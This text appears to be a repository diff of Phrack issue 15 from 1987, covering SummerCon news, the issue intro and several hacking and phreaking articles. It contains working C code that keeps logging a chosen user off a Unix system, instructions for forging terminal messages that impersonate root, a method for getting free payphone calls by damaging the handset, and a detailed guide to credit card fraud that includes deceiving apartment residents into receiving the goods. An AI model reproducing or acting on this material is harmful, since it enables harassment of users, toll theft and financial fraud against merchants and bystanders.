||||
of an Alliance teleconference on the tape where Dan tried to act like he was
|
||||
some real important person (what a joke!) and a botched up social engineering
|
||||
job. The BIG shocker hit when I flipped the tape over to discover 45 minutes
|
||||
of a conversation with John Maxfield aka Cable Pair of BoardScan. I won't go
|
||||
into details about the conversations right now, but the scary part is that the
|
||||
tape ends before the phone call does. In other words we don't know exactly
|
||||
how much information was passed, but we do know that it has been an ongoing
|
||||
thing, perhaps for months. An actual overview and possible transcript of these
|
||||
conversations will appear in PWN XV.
|
||||
|
||||
I was in shock. I couldn't believe what I was hearing! It especially hurt
|
||||
when information was passed about people that I actually knew and had met. If
|
||||
only I had played that tape the night before, this would be a different story
|
||||
entirely. I didn't know exactly what to do. I had stopped calling out, but I
|
||||
was willing to pay for a few calls to spread the news. The only problem was
|
||||
that the majority of the people I wanted to contact were still en route home
|
||||
or unreachable. I finally was able to reach Tuc who was still in St. Louis.
|
||||
He dropped by and I played him the tape. Since then, Taran King and Forest
|
||||
Ranger have also heard most of the tape and preliminary investigations have
|
||||
begun.
|
||||
|
||||
We have discovered some information linking Dan The Operator to the FBI, but
|
||||
more on that next issue.
|
||||
______________________________________________________________________________
|
||||
|
||||
PWN SummerCon '87 Quicknotes
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
SummerCon Promotional Posters were created by Lucifer 666. They featured many
|
||||
trademarks of well known telecommunications companies as well as different
|
||||
plans and schematics for boxes and other equipment.
|
||||
------------------------------------------------------------------------------
|
||||
The Southern Baptists were in town during the week for some National
|
||||
convention of their own.
|
||||
------------------------------------------------------------------------------
|
||||
Johnny Rotten was supposed to appear at SummerCon '87 and called to confirm
|
||||
his plans on Friday Evening, June 19, 1987. He never appeared.
|
||||
------------------------------------------------------------------------------
|
||||
The full guest list of SummerCon '87 includes;
|
||||
|
||||
Bill From RNOC / Bit Master / Cheap Shades / Control C / Dan The Operator
|
||||
Data Line / Doom Prophet / Forest Ranger / Knight Lightning / Lex Luthor
|
||||
LOKI / Lucifer 666 / Ninja NYC / Phantom Phreaker / Sir Francis Drake
|
||||
Synthetic Slug / Taran King / The Disk Jockey / The Leftist / Tuc
|
||||
|
||||
In closing, SummerCon '87 was a fantastic success and anyone who missed it,
|
||||
missed out! See you next year at SummerCon '88. Plans are already being
|
||||
made!
|
||||
|
||||
:Knight Lightning
|
||||
______________________________________________________________________________
|
||||
|
46
phrack15/1.txt
Normal file
46
phrack15/1.txt
Normal file
|
@ -0,0 +1,46 @@
|
|||
===== Phrack Magazine presents Phrack 15 =====
|
||||
|
||||
===== File 1 of 8 : Phrack 15 Intro =====
|
||||
|
||||
|
||||
|
||||
8/7/87
|
||||
|
||||
|
||||
So, did you miss us? Yes, Phrack is back! Phrack Magazine's beloved
|
||||
founders, Taran King and Knight Lightning, have gone off to college, and the
|
||||
recent busts (summarized completely in this month's Phrack World News) have
|
||||
made it difficult to keep the magazine going.
|
||||
|
||||
TK and KL have put the editorship of Phrack in the hands of Elric of
|
||||
Imrryr and Sir Francis Drake. SFD is primarily responsible for PWN. As of
|
||||
yet we have no 'Official Phrack BBS.'
|
||||
|
||||
Due to various obstacles, the first issue under the new editorship is
|
||||
rather small. Fortunately, however, the overall quality of the files
|
||||
presented is among the highest ever. We've managed to keep references to
|
||||
Oryan QUEST down to as little as possible and we've resisted the temptation to
|
||||
include some second-rate files as "fillers." Naturally, we're still looking
|
||||
for excellent, unpublished phreak/hack/pyro/anarchy files to publish in Phrack
|
||||
XVI and beyond. If you have an article, we'd like to see it! Get in touch
|
||||
with SFD or Elric when your file is ready for submission.
|
||||
|
||||
-- Shooting Shark
|
||||
Contributing Editor
|
||||
Note: For now you can contact Phrack Inc. at:
|
||||
Lunatic Labs: 415-278-7421 300/1200 (Sir Francis Drake or Elric of Imrryr)
|
||||
Free World: 301-668-7657 300/1200/2400/9600 (Disk Jockey)
|
||||
|
||||
|
||||
Phrack XV Table of Contents
|
||||
===========================
|
||||
|
||||
15-1. Phrack XV Intro by Shooting Shark (2K)
|
||||
15-2. More Stupid Unix Tricks by Shooting Shark (10K)
|
||||
15-3. Making Free Local Payfone Calls by Killer Smurf (7K)
|
||||
15-4. Advanced Carding XIV by The Disk Jockey (12K)
|
||||
15-5. Gelled Flame Fuels by Elric of Imrryr (12K)
|
||||
15-6. PWN I: The Scoop on Dan The Operator by KL (19K)
|
||||
15-7. PWN II: The July Busts by Knight Lightning (21K)
|
||||
15-8. PWN III: The Affidavit by SFD (6K)
|
||||
|
263
phrack15/2.txt
Normal file
263
phrack15/2.txt
Normal file
|
@ -0,0 +1,263 @@
|
|||
===== Phrack Magazine presents Phrack 15 =====
|
||||
|
||||
===== File 2 of 8 =====
|
||||
|
||||
I thought I had written everything there is to write about the Unix operating
|
||||
system until I was recently asked to put out yet another file... so I said
|
||||
"I'll try, but don't publish my file along with an article by The Radical
|
||||
Rocker this time!" These demands having been met, I booted up the PC and
|
||||
threw together...
|
||||
|
||||
--- ---- ---- ------ ------ -- -- ---- -----
|
||||
% Yet Even More Stupid Things to Do With Unix! $
|
||||
--- ---- ---- ------ ------ -- -- ---- -----
|
||||
|
||||
By Shooting Shark.
|
||||
Submitted August 26, 1987
|
||||
|
||||
|
||||
These two topics are methods of annoying other users of the system and
|
||||
generally being a pest. But would you want to see a file on *constructive*
|
||||
things to do with Unix? Didn't think so...
|
||||
|
||||
|
||||
-- ------- ----- --- --- ------
|
||||
1. Keeping Users Off The System
|
||||
-- ------- ----- --- --- ------
|
||||
|
||||
Now, we all know by now how to log users off (one way is to redirect an 'stty
|
||||
0' command to their tty) but unless you have root privs, this will not work
|
||||
when a user has set 'mesg n' and prevented other users from writing to their
|
||||
terminal. But even users who have a 'mesg n' command in their .login (or
|
||||
.profile or .cshrc) file still have a window of vulnerability, the time
|
||||
between login and the locking of their terminal. I designed the following
|
||||
program, block.c, to take advantage of this fact.
|
||||
|
||||
To get this source running on your favorite Unix system, upload it, call it
|
||||
'block.c', and type the following at the % or $ prompt:
|
||||
|
||||
cc -o block block.c
|
||||
|
||||
once you've compiled it successfully, it is invoked like so:
|
||||
|
||||
block username [&]
|
||||
|
||||
The & is optional and recommended - it runs the program in the background,
|
||||
thus letting you do other things while it's at work.
|
||||
|
||||
If the user specified is logged in at present, it immediately logs them out
|
||||
(if possible) and waits for them to log in. If they aren't logged in, it
|
||||
starts waiting for them. If the user is presently logged in but has their
|
||||
messages off, you'll have to wait until they've logged out to start the thing
|
||||
going.
|
||||
|
||||
Block is essentially an endless loop : it keeps checking for the occurrence of
|
||||
the username in /etc/utmp. When it finds it, it immediately logs them out and
|
||||
continues. If for some reason the logout attempt fails, the program aborts.
|
||||
Normally this won't happen - the program is very quick when run unmodified.
|
||||
However, to get such performance, it runs in a very tight loop and will eat up
|
||||
a lot of CPU time. Notice that near the end of the program there is the line:
|
||||
|
||||
/*sleep(SLEEP) */
|
||||
|
||||
the /* and */ are comment delimiters - right now the line is commented out.
|
||||
If you remove the comments and re-compile the program, it will then 'go to
|
||||
sleep' for the number of seconds defined in SLEEP (default is 5) at the end of
|
||||
every loop. This will save the system load but will slightly decrease the
|
||||
odds of catching the user during their 'window of vulnerability.'
|
||||
|
||||
If you have a chance to run this program at a computer lab at a school or
|
||||
somewhere similar, run this program on a friend (or an enemy) and watch the
|
||||
reaction on their face when they repeatedly try to log in and are logged out
|
||||
before they can do *anything*. It is quite humorous. This program is also
|
||||
quite nasty and can make you a lot of enemies!
|
||||
|
||||
caveat #1: note that if you run the program on yourself, you will be logged
|
||||
out, the program will continue to run (depending on the shell you're under)
|
||||
and you'll have locked yourself out of the system - so don't do this!
|
||||
|
||||
caveat #2: I wrote this under OSx version 4.0, which is a licensed version of
|
||||
Unix which implements 4.3bsd and AT&T sysV. No guarantees that it will work
|
||||
on your system.
|
||||
|
||||
caveat #3: If you run this program in background, don't forget to kill it
|
||||
when you're done with it! (when you invoke it with '&', the shell will give
|
||||
you a job number, such as '[2] 90125'. If you want to kill it later in the
|
||||
same login session, type 'kill %2'. If you log in later and want to kill it,
|
||||
type 'kill 90125'. Just read the man page on the kill command if you need any
|
||||
help...
|
||||
|
||||
----- cut here -----
|
||||
|
||||
/* block.c -- prevent a user from logging in
|
||||
* by Shooting Shark
|
||||
* usage : block username [&]
|
||||
* I suggest you run this in background.
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <utmp.h>
|
||||
#include <ctype.h>
|
||||
#include <termio.h>
|
||||
#include <fcntl.h>
|
||||
|
||||
#define W_OK2
|
||||
#define SLEEP5
|
||||
#define UTMP"/etc/utmp"
|
||||
#define TTY_PRE "/dev/"
|
||||
|
||||
main(ac,av)
|
||||
int ac;
|
||||
char *av[];
|
||||
{
|
||||
int target, fp, open();
|
||||
struct utmpuser;
|
||||
struct termio*opts;
|
||||
char buf[30], buf2[50];
|
||||
|
||||
if (ac != 2) {
|
||||
printf("usage : %s username\n",av[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
||||
for (;;) {
|
||||
|
||||
if ((fp = open(UTMP,0)) == -1) {
|
||||
printf("fatal error! cannot open %s.\n",UTMP);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
||||
while (read(fp, &user, sizeof user) > 0) {
|
||||
if (isprint(user.ut_name[0])) {
|
||||
if (!(strcmp(user.ut_name,av[1]))) {
|
||||
|
||||
printf("%s is logging in...",user.ut_name);
|
||||
sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
|
||||
printf("%s\n",buf);
|
||||
if (access(buf,W_OK) == -1) {
|
||||
printf("failed - program aborting.\n");
|
||||
exit(-1);
|
||||
}
|
||||
else {
|
||||
if ((target = open(buf,O_WRONLY)) != EOF) {
|
||||
sprintf(buf2,"stty 0 > %s",buf);
|
||||
system(buf2);
|
||||
printf("killed.\n");
|
||||
sleep(10);
|
||||
}
|
||||
|
||||
} /* else */
|
||||
} /* if strcmp */
|
||||
} /* if isprint */
|
||||
} /* while */
|
||||
close(fp);
|
||||
|
||||
/*sleep(SLEEP); */
|
||||
|
||||
} /* for */
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
}
|
||||
|
||||
----- cut here -----
|
||||
|
||||
|
||||
-- ------------- ----- ----- ---- ------ --- ------
|
||||
2. Impersonating other users with 'write' and 'talk'
|
||||
-- ------------- ----- ----- ---- ------ --- ------
|
||||
|
||||
This next trick wasn't exactly a work of stupefying genius, but is a little
|
||||
trick (that anybody can do) that I sometimes use to amuse myself and, as with
|
||||
the above, annoy the hell out of my friends and enemies.
|
||||
|
||||
Nearly every Unix system has the 'write' program, for conversing with other
|
||||
logged-in users. As a quick summary:
|
||||
|
||||
If you see that user 'clara' is logged in with the 'who' or 'w' command or
|
||||
whatever, and you wish to talk to her for some reason or another, you'd type
|
||||
'write clara'. Clara then would see on her screen something like this (given
|
||||
that you are username 'shark'):
|
||||
|
||||
|
||||
[3 ^G's] Message from shark on ttyi13 at 23:14 ...
|
||||
|
||||
You then type away at her, and whatever you type is sent to her terminal
|
||||
line-by-line. If she wanted to make it a conversation rather than a
|
||||
monologue, she'd type 'write shark,' you'd get a message similar to the above
|
||||
on your terminal, and the two of you would type away at each other to your
|
||||
little heart's content. If either one of you wanted to end the conversation,
|
||||
you would type a ^D. They would then see the characters 'EOF' on their
|
||||
screen, but they'd still be 'write'ing to you until they typed a ^D as well.
|
||||
|
||||
Now, if you're on a bigger installation you'll probably have some sort of
|
||||
full-screen windowing chat program like 'talk'. My version of talk sends the
|
||||
following message:
|
||||
|
||||
Message from Talk_Daemon@tibsys at 23:14 ...
|
||||
talk: connection requested by shark@tibsys.
|
||||
talk: respond with: talk shark@tibsys
|
||||
|
||||
Anyway, here's where the fun part begins: It's quite easy to put a sample
|
||||
'write' or 'talk' message into a file and then edit so that the 'from' is a
|
||||
different person, and the tty is listed differently. If you see that your
|
||||
dorky friend roger is on ttyi10 and the root also happens to be logged on on
|
||||
ttyi01, make the file look something like this:
|
||||
|
||||
[3 control-G's] Message from root on ttyi01 at [the current time]
|
||||
|
||||
wackawackawackawackawacka!!!
|
||||
|
||||
[or a similarly confusing or rude message...]
|
||||
|
||||
EOF
|
||||
|
||||
Then, send this file to roger's terminal with:
|
||||
|
||||
cat filename > /dev/ttyi10
|
||||
|
||||
He'll get the message on his terminal and wonder what the hell the superuser
|
||||
is talking about. He might even 'write' back to the superuser with the intent
|
||||
of asking 'what the hell are you talking about?'. For maximum effectiveness,
|
||||
*simultaneously* send a message to root 'from' roger at the appropriate
|
||||
terminal with an equally strange message - they'll then engage in a
|
||||
conversation that will go something like "what did you mean by that?" "what
|
||||
do you mean, what do I mean? What did *you* mean by that?" etc. A splendid
|
||||
time is guaranteed for all! Note that you don't have to make 'root' the
|
||||
perpetrator of the gag, any two currently logged-in users who have their
|
||||
terminals open for messages can join in on the fun.
|
||||
|
||||
Similarly, you can fake a few 'talk' pages from/to two people...they will then
|
||||
probably start talking...although the conversation will be along the lines of
|
||||
"what do you want?" "you tell me." "you paged me, you tell *me." etcetera,
|
||||
while you laugh yourself silly or something like that.
|
||||
|
||||
A variation on the theme: As I said, when using 'write' you type a ^D to end
|
||||
the conversation, and the person you're typing at sees an 'EOF' on their
|
||||
screen. But you could also just *type* 'EOF', and they'd think you've
|
||||
quit...but you still have an open line to their terminal. Even if they later
|
||||
turn messages off, you still have the ability to write to their terminal.
|
||||
Keeping this fact in mind, anybody who knows what they're doing can write a
|
||||
program similar to my 'block' program above that doesn't log a user out when
|
||||
they appear on the system, but opens their tty as a device and keeps the file
|
||||
handle in memory so you can redirect to their terminal - to write rude
|
||||
messages or to log them out or whatever - at any time, until they log out.
|
||||
|
||||
As I said, there was no great amount of genius in the above discourse, but
|
||||
it's a pastime I enjoy occasionally...
|
||||
|
||||
-- Shooting Shark
|
||||
|
||||
|
||||
"the first fact to face is that unix was not developed with security, in any
|
||||
realistic sense, in mind..."
|
||||
|
||||
-- Dennis M. Ritchie
|
||||
|
||||
"Oryan QUEST couldn't hack his way out of a UNIX system, let alone into one."
|
||||
|
||||
-- Tharrys Ridenow
|
125
phrack15/3.txt
Normal file
125
phrack15/3.txt
Normal file
|
@ -0,0 +1,125 @@
|
|||
===== Phrack Magazine presents Phrack 15 =====
|
||||
|
||||
===== File 3 of 8 =====
|
||||
|
||||
*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
|
||||
* *
|
||||
* How to "Steal" Local Calls from Most Payphones *
|
||||
* *
|
||||
* August 25, 1987 *
|
||||
* *
|
||||
* By Killer Smurf and Pax Daronicus *
|
||||
* *
|
||||
*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
|
||||
|
||||
Most of you have seen WarGames, right? Remember the part where David
|
||||
was stranded in Colorado and needed to call his girlfriend in Seattle? We
|
||||
knew you did. If you didn't, what David done was unscrew the mouthpiece
|
||||
on the payphone and make some connection between the mouthpiece and the
|
||||
phone. Well... that was pretty close to reality except for two things...
|
||||
1> Nowadays, mouthpieces are un-unscrewable, and 2> You cannot make long
|
||||
distance or toll calls using that method. Maybe that DID work on older
|
||||
phones, but you know Ma Bell. She always has a damn cure for every thing
|
||||
us Phreaks do. She glued on the mouthpiece!
|
||||
|
||||
Now to make free local calls, you need a finishing nail. We highly
|
||||
recommend "6D E.G. FINISH C/H, 2 INCH" nails. These are about 3/32 of an
|
||||
inch in diameter and 2 inches long (of course). You also need a large
|
||||
size paper clip. By large we mean they are about 2 inches long
|
||||
(FOLDED). Then you unfold the paper clip. Unfold it by taking each
|
||||
piece and moving it out 90 degrees. When it is done it should look
|
||||
somewhat like this:
|
||||
/----------\
|
||||
: :
|
||||
: :
|
||||
: :
|
||||
: :
|
||||
\-----
|
||||
|
||||
Now, on to the neat stuff. What you do, instead of unscrewing the
|
||||
glued-on mouthpiece, is insert the nail into the center hole of the
|
||||
mouthpiece (where you talk) and push it in with pressure or just hammer
|
||||
it in by hitting the nail on something. Just DON'T KILL THE MOUTHPIECE!
|
||||
You could damage it if you insert the nail too far or at some weird
|
||||
angle. If this happens then the other party won't be able to hear what
|
||||
you say.
|
||||
You now have a hole in the mouthpiece in which you can easily insert
|
||||
the paper clip. So, take out the nail and put in the paper clip. Then
|
||||
take the other end of the paper clip and shove it under the rubber cord
|
||||
protector at the bottom of the handset (you know, the blue guy...). This
|
||||
should end up looking remotely like...like this:
|
||||
|
||||
/----------\ Mouthpiece
|
||||
: : /
|
||||
Paper clip --> : : /
|
||||
: /---:---\
|
||||
: : : :------------>
|
||||
====================\---))): : To earpiece ->
|
||||
^ ^ \-------------------->
|
||||
: :
|
||||
: :
|
||||
Cord Blue guy
|
||||
|
||||
(The paper clip is shoved under the blue guy to make a good connection
|
||||
between the inside of the mouthpiece and the metal cord.)
|
||||
|
||||
Now, dial the number of a local number you wish to call, sayyyy,
|
||||
MCI. If everything goes okay, it should ring and not answer with the
|
||||
"The Call You Have Made Requires a 20 Cent Deposit" recording. After the
|
||||
other end answers the phone, remove the paper clip. It's all that
|
||||
simple, see?
|
||||
|
||||
There are a couple problems, however. One is, as we mentioned
|
||||
earlier, the mouthpiece not working after you punch it. If this happens
|
||||
to you, simply move on to the next payphone. The one you are now on is
|
||||
lost. Another problem is that the touch tones won't work when the paper
|
||||
clip is in the mouthpiece. There are two ways around this..
|
||||
A> Dial the first 6 numbers. This should be done without the paper
|
||||
clip making the connection, i.e., one side should not be connected. Then
|
||||
connect the paper clip, hold down the last digit, and slowly pull the
|
||||
paper clip out at the mouthpiece's end.
|
||||
B> Don't use the paper clip at all. Keep the nail in after you
|
||||
punch it. Dial the first 6 digits. Before dialing the last digit, touch
|
||||
the nail head to the plate on the main body of the phone, the money safe
|
||||
thingy..then press the last number.
|
||||
|
||||
The reason that this method is sometimes called clear boxing is
|
||||
because there is another type of phone which lets you actually make the
|
||||
call and listen to them say "Hello, hello?" but it cuts off the
|
||||
mouthpiece so they can't hear you. The Clear Box is used on that to
|
||||
amplify your voice signals and send it through the earpiece. If you see
|
||||
how this is even slightly similar to the method we just described up
|
||||
there, kindly explain it to US!! Cause WE don't GET IT!
|
||||
|
||||
Anyways, this DOES work on almost all single slot, Dial Tone First
|
||||
payphones (Pacific Bell for sure). We do it all the time. This is the
|
||||
least, WE STRESS *LEAST*, risky form of Phreaking. And remember. There
|
||||
are other Phreaks like you out there who have read this article and punch
|
||||
payphones, so look before you punch, and save time.
|
||||
|
||||
If you feel the insane desire to have to contact us to bitch at us
|
||||
for some really stupid mistake in this article, you can reach us at
|
||||
Lunatic Labs Unltd...415/278-7421. It should be up for quite a while..
|
||||
|
||||
|
||||
Also, if you think of any new ideas that can be used in conjunction
|
||||
with this method, such as calling a wrong number on purpose and demanding
|
||||
your quarter back from the 0perator, tell us!! Post it on Looney!! Oh,
|
||||
and if this only works on Pac Bell phones, tell us also! Thanks for your
|
||||
time, upload this to every board you can find. You may use this material
|
||||
in any publication - electronic, written, or otherwise without consent of
|
||||
the authors as long as it is reproduced in whole, with all credit to the
|
||||
authors (us!) and Lunatic Labs. And now, the Bullshit:
|
||||
|
||||
_________________________________________________________________________
|
||||
|
||||
DISCLAIMER: This disclaimer disclaims that this article was written for
|
||||
your information only. Any injuries resulting from this file
|
||||
(punctured hands, sex organs, etc.) is NOT OUR FAULT! And of
|
||||
course if you get really stupidly busted in any way because
|
||||
of this, it ain't our fault either. You're the dumb ass with
|
||||
the nail. So, proceed with care, but... HELL! Have fun.
|
||||
Later...
|
||||
_________________________________________________________________________
|
||||
|
||||
|
214
phrack15/4.txt
Normal file
214
phrack15/4.txt
Normal file
|
@ -0,0 +1,214 @@
|
|||
===== Phrack Magazine presents Phrack 15 =====
|
||||
|
||||
===== File 4 of 8 =====
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
~ The Disk Jockey ~
|
||||
~ ~
|
||||
~ presents: ~
|
||||
~ ~
|
||||
~ Advanced Carding XIV: ~
|
||||
~ Clarification of Many Credit Card Misconceptions ~
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
(A 2af Presentation)
|
||||
Preface:
|
||||
-------
|
||||
After reading files that have been put out by various groups and
|
||||
individuals concerning carding, credit fraud, and the credit system in
|
||||
general, I am finding more and more that people are basing these files on
|
||||
ideas, rather than knowing how the system actually works. In this article I
|
||||
hope to enlighten you on some of the grey areas that I find most people either
|
||||
do not clarify, or don't know what they are talking about. I can safely say
|
||||
that this will be the most accurate file available dealing with credit fraud.
|
||||
I have worked for and against credit companies, and know how they work from
|
||||
the insiders point of view, and I have yet to meet someone in the modem world
|
||||
that knows it better.
|
||||
|
||||
This file is dedicated to all the phreaks/hacks that were busted for various
|
||||
reasons in the summer of 1987.
|
||||
|
||||
|
||||
Obtaining Cards:
|
||||
---------------
|
||||
Despite popular belief, there IS a formula for Visa and Mastercard
|
||||
numbers. All credit card account numbers are issued by on issuing company, in
|
||||
this case, Visa or Mastercard. Although the banks are not aware of any type
|
||||
of pattern to the account numbers, there IS one that can be found. I plan to
|
||||
publish programs in the near future that will use the various formulas for
|
||||
Visa, Mastercard and American Express to create valid accounts.
|
||||
|
||||
Accounts:
|
||||
--------
|
||||
All that is needed to successfully use a Visa/MC account is the account
|
||||
number itself. I don't know how many times I have gotten into arguments with
|
||||
people over this, but this is the way it is. I'll expand on this.
|
||||
|
||||
First of all, on all Visa/MC cards, the name means NOTHING. NOTHING AT ALL.
|
||||
You do not need this name and address of the cardholder to successfully use
|
||||
the account, at no time during authorization is the name ever needed, and with
|
||||
over 50,000 banks, credit unions, and various other financial institutions
|
||||
issuing credit cards, and only 5 major credit verification services, it is
|
||||
impossible to keep personal data on each cardholder.
|
||||
|
||||
Ordering something and having it sent with the real cardholder's name is only
|
||||
going to make things more difficult, at best. There is no way that you can
|
||||
tell if the card is a normal card, or a premium (gold) card merely by looking
|
||||
at the account number. The only thing that can be told by the account number
|
||||
is the bank that issued the card, but this again, is not needed.
|
||||
|
||||
The expiration date means nothing. Don't believe me? Call up an
|
||||
authorization number and check a card and substitute 12/94, and if the account
|
||||
number is good, the card will pass. The expiration date is only a binary-type
|
||||
check to see if the card is good, (Yes/No), it is NOT a checksum-type check
|
||||
code that has to be matched up to the card account to be valid.
|
||||
|
||||
Carding Stupid Things:
|
||||
---------------------
|
||||
Whenever anyone, ANYONE tries to card something for the first time, they
|
||||
ALWAYS want to get something for their computer. This is nice and all, but
|
||||
just think that every person that has ever tried to card has tried to get a
|
||||
hard drive and a new modem. Everyone does it, thus every single computer
|
||||
company out there is aware and watching for that. If I could give every
|
||||
single person who ever tries to card one piece of advice, it would be to NEVER
|
||||
order computer equipment. I know there are a hundred guys that will argue
|
||||
with me about it, but common sense should tell you that the merchants are
|
||||
going to go out of there way to check these cards.
|
||||
|
||||
Merchant Checking:
|
||||
-----------------
|
||||
Since I brought up merchants checking the cards, I will review the two
|
||||
basic ways that almost all mail-order merchants use. Keep these in mind when
|
||||
designing your name, address and phone number for your drop.
|
||||
|
||||
The Directory Assistance Cross-Reference:
|
||||
----------------------------------------
|
||||
This method is most popular because it is cheap, yet effective. You can
|
||||
usually tell these types of checks because during the actual order, you are
|
||||
asked questions such as "What is your HOME telephone number" and your billing
|
||||
address. Once they have this information, they can call directory assistance
|
||||
for your area code, say 312, and ask "May I have the phone number for a Larry
|
||||
Jerutis at 342 Stonegate Drive?" Of course, the operator should give a number
|
||||
that matches up with the one that you gave them as your home number. If it
|
||||
doesn't, the merchant knows that something is up. Even if it is an unlisted
|
||||
number, the operator will say that there is a Jerutis at that address, but the
|
||||
telephone number is non-published, which is enough to satisfy the merchant.
|
||||
If a problem is encountered, the order goes to a special pile that is actually
|
||||
called and the merchant will talk to the customer directly. Many merchants
|
||||
have policy to not ship at all if the customer can not provide a home phone
|
||||
number that corresponds with the address.
|
||||
|
||||
The Call Back:
|
||||
-------------
|
||||
This deals with the merchant calling you back to verify the order. This
|
||||
does not imply, however, that you can stand by a payphone and wait for them to
|
||||
call back. Waiting by a payphone is one of the stupidest things I have ever
|
||||
heard of, being that few, if any, places other than the pizza place will call
|
||||
back immediately like that. What most places will do is process your order,
|
||||
etc, and then call you, sometimes it's the next day, sometimes that night. It
|
||||
is too difficult to predict when they will call back, but if they don't get a
|
||||
hold of you, or only get a busy, or an answering machine, they won't send the
|
||||
merchandise until they speak with you voice. This method is difficult to
|
||||
defeat, but fortunately, due to the high cost of phone bills, the directory
|
||||
assistance method is preferred.
|
||||
|
||||
Billing Address:
|
||||
---------------
|
||||
This should ALWAYS be the address that you are having the stuff sent to.
|
||||
One of the most stupidest things that you could do to botch up a carding job
|
||||
would be to say something like "Well, I don't want it sent to my house, I want
|
||||
it sent to....", or "Well, this is my wife's card, and her name is....".
|
||||
These methods may work, but for the most part, only rouse suspicion on you.
|
||||
If the order sounds pretty straightforward, and there isn't any unusual
|
||||
situations, it will better the chances of the order going through.
|
||||
|
||||
Drop Houses:
|
||||
-----------
|
||||
These are getting harder and harder to come by for the reasons that
|
||||
people are more careful then before, and that UPS is smarter, also. Your best
|
||||
bet is to hit somebody that just moved, and I mean JUST moved, being that UPS
|
||||
will not know that there is nobody at the house anymore if it is within, say,
|
||||
a week of their moving. It's getting to the point where in some areas, UPS
|
||||
won't even leave the stuff on the doorstep, due to liability on their part of
|
||||
doing that. The old "Leave the stuff in the shrubs while I am at work" note
|
||||
won't work, most people are smart enough to know that something is odd, and
|
||||
will more than likely leave the packages with the neighbors before they shove
|
||||
that hard drive in the bushes. Many places, such as Cincinnati Microwave
|
||||
(maker of the Escort and Passport radar detectors) require a signature when
|
||||
the package is dropped off, making it that much harder.
|
||||
|
||||
Best Bet:
|
||||
--------
|
||||
Here is the method that I use that seems to work well, despite it being a
|
||||
little harder to match up names and phone numbers. Go to an apartment
|
||||
building and go to the top floor. The trashier the place, the better. Knock
|
||||
on the door and ask if "Bill" is there. Of course, or at least hopefully,
|
||||
there will be no Bill at that address. Look surprised, then say "Well, my
|
||||
friend Bill gave me this address as being his." The occupants will again say
|
||||
"Sorry, but there is no Bill here...". Then, say that "I just moved here to
|
||||
go to school, and I had my parents sent me a bunch of stuff for school here,
|
||||
thinking that this was Bill's place." They almost always say "Oh Boy...".
|
||||
Then respond with "Well, if something comes, could you hold on to it for me,
|
||||
and I will come by in a week and see if anything came?" They will always say
|
||||
something to the effect of "Sure, I guess we could do that...". Thank them a
|
||||
million times for helping you out, then leave. A few days after your stuff
|
||||
comes, drop by and say, "Hi, I'm Jim, did anything come for me?". If
|
||||
everything was cool, it should have. The best thing to do with this is only
|
||||
order one or two small things, rather than an AT system with an extra monitor.
|
||||
People feel more comfortable about signing for something small for someone,
|
||||
rather than something big, being that most people naturally think that the
|
||||
bigger it is, the more expensive it is.
|
||||
This is the best method that I know of, the apartment occupants will
|
||||
usually sign for the stuff, and be more than happy to help you out.
|
||||
|
||||
Advice:
|
||||
------
|
||||
The thing that I can never stress enough is to not become greedy. Sure,
|
||||
the first shipment may come in so easy, so risk-free that you feel as if you
|
||||
can do it forever. Well, you can't. Eventually, if you do it frequently
|
||||
enough, you will become the subject of a major investigation by the local
|
||||
authorities if this becomes a real habit. Despite anything that anyone ever
|
||||
tells you about the police being "stupid and ignorant", you better reconsider.
|
||||
The police force is a VERY efficient organization once they have an idea as to
|
||||
who is committing these crimes. They have the time and the money to catch
|
||||
you.
|
||||
|
||||
Don't do it with friends. Don't even TELL friends that you are doing it. This
|
||||
is the most stupid, dangerous thing that you could do. First of all, I don't
|
||||
care how good of friends anyone may be, but if a time came that you hated each
|
||||
other, this incident could be very bad for you. What could be even worse is a
|
||||
most common scenario: You and a friend get a bunch of stuff, very
|
||||
successfully. You tell a few friends at school, either you or him have to
|
||||
tell only one person and it gets all over. Anyways, there is ALWAYS some type
|
||||
of informant in every high-school. Be it a teacher, son or daughter of a cop,
|
||||
or whatever, there is always a leak in every high school. The police decide
|
||||
to investigate, and find that it is becoming common knowledge that you and/or
|
||||
your friend have ways of getting stuff for "free" via the computer. Upon
|
||||
investigation, they call in your friend, and tell him that they have enough
|
||||
evidence to put out a warrant for his arrest, and that they might be able to
|
||||
make a deal with him. If he gives a complete confession, and be willing to
|
||||
testify against your in court, they will let him off with only paying the
|
||||
restitution (paying for the stuff you got). Of course, just about anyone is
|
||||
going to think about themselves, which is understandable, and you will get the
|
||||
raw end of the deal. Don't let anyone ever tell you that as a minor, you
|
||||
won't get in any trouble, because you can and will. If you are really
|
||||
uncooperative, they may have you tried as an adult, which would really put you
|
||||
up the creek, and even as a juvenile, you are eligible to receive probation,
|
||||
fines, court costs, and just about anything else the judge wants to do with
|
||||
you. All this boils down to is to not tell anyone anything, and try not to do
|
||||
it with anyone.
|
||||
|
||||
|
||||
Well, that should about wrap up this file. I hope this clears up some
|
||||
misconceptions about carding. I am on many boards, and am always open to any
|
||||
comments/suggestions/threats that anyone might have. I can always be reached
|
||||
on The Free World II (301-668-7657) or Lunatic Labs (415-278-7421).
|
||||
|
||||
Good luck.
|
||||
|
||||
-The Disk Jockey
|
393
phrack15/5.txt
Normal file
393
phrack15/5.txt
Normal file
|
@ -0,0 +1,393 @@
|
|||
===== Phrack Magazine presents Phrack 15 =====
|
||||
|
||||
===== File 5 of 8 =====
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
GELLED FLAME FUELS
|
||||
------------------
|
||||
|
||||
